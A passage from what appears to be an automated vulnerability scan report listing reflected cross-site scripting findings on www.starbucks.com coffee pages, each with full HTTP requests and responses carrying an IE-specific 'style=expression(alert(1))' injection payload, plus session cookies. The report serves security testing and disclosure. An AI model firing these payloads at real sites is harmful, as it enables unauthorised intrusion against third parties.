Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:26 GMT
Connection: close
Content-Length: 42434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?72f92"style="x:expression(alert(1))"a4e88aeeae4=1"/>
...[SNIP]...

3.9. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96717"style="x:expression(alert(1))"9bd61317b0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?96717"style%3d"x%3aexpression(alert(1))"9bd61317b0b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:59 GMT
Connection: close
Content-Length: 42477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?96717"style="x:expression(alert(1))"9bd61317b0b=1"/>
...[SNIP]...

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da712"style%3d"x%3aexpression(alert(1))"153353c2d05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da712"style="x:expression(alert(1))"153353c2d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?da712"style%3d"x%3aexpression(alert(1))"153353c2d05=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:58:58 GMT
Connection: close
Content-Length: 41224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?da712"style="x:expression(alert(1))"153353c2d05=1"/>
...[SNIP]...

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b02"style%3d"x%3aexpression(alert(1))"11530d23784 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0b02"style="x:expression(alert(1))"11530d23784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?e0b02"style%3d"x%3aexpression(alert(1))"11530d23784=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:43 GMT
Connection: close
Content-Length: 42403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?e0b02"style="x:expression(alert(1))"11530d23784=1"/>
...[SNIP]...

3.12. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c78ef"style="x:expression(alert(1))"30e6886810a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?c78ef"style%3d"x%3aexpression(alert(1))"30e6886810a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:03 GMT
Connection: close
Content-Length: 52822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?c78ef"style="x:expression(alert(1))"30e6886810a=1"/>
...[SNIP]...

3.13. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c317"style="x:expression(alert(1))"4e1c91bd61f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style%3d"x%3aexpression(alert(1))"4e1c91bd61f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:31 GMT
Connection: close
Content-Length: 42269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi?1c317"style="x:expression(alert(1))"4e1c91bd61f=1"/>
...[SNIP]...

3.14. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f782"style="x:expression(alert(1))"945e17cc48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style%3d"x%3aexpression(alert(1))"945e17cc48d=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:14 GMT
Content-Length: 41929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry?9f782"style="x:expression(alert(1))"945e17cc48d=1"/>
...[SNIP]...

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6142"style="x:expression(alert(1))"e771ce6760f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style%3d"x%3aexpression(alert(1))"e771ce6760f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:14 GMT
Connection: close
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?b6142"style="x:expression(alert(1))"e771ce6760f=1"/>
...[SNIP]...

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2762f"style="x:expression(alert(1))"d1da931e99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style%3d"x%3aexpression(alert(1))"d1da931e99d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:54:45 GMT
Connection: close
Content-Length: 42842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan?2762f"style="x:expression(alert(1))"d1da931e99d=1"/>
...[SNIP]...

3.17. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 818c9"style="x:expression(alert(1))"3aaeb9fa4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?818c9"style%3d"x%3aexpression(alert(1))"3aaeb9fa4a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:49 GMT
Connection: close
Content-Length: 51777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?818c9"style="x:expression(alert(1))"3aaeb9fa4a=1"/>
...[SNIP]...

3.18. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4285"style="x:expression(alert(1))"cebb7d2a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?d4285"style%3d"x%3aexpression(alert(1))"cebb7d2a308=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:37 GMT
Content-Length: 53694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?d4285"style="x:expression(alert(1))"cebb7d2a308=1"/>
...[SNIP]...

3.19. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7511a"style="x:expression(alert(1))"c08da2b8d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?7511a"style%3d"x%3aexpression(alert(1))"c08da2b8d6b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:56:24 GMT
Connection: close
Content-Length: 53628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?7511a"style="x:expression(alert(1))"c08da2b8d6b=1"/>
...[SNIP]...

3.20. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32506"style%3d"x%3aexpression(alert(1))"0b3e0429598 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32506"style="x:expression(alert(1))"0b3e0429598 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?32506"style%3d"x%3aexpression(alert(1))"0b3e0429598=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:51:46 GMT
Connection: close
Content-Length: 54456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?32506"style="x:expression(alert(1))"0b3e0429598=1"/>
...[SNIP]...

3.21. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fd8"style="x:expression(alert(1))"eee799f60ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?36fd8"style%3d"x%3aexpression(alert(1))"eee799f60ab=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:18 GMT
Connection: close
Content-Length: 41207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?36fd8"style="x:expression(alert(1))"eee799f60ab=1"/>
...[SNIP]...

3.22. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d4f5"style="x:expression(alert(1))"07322c9d36a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

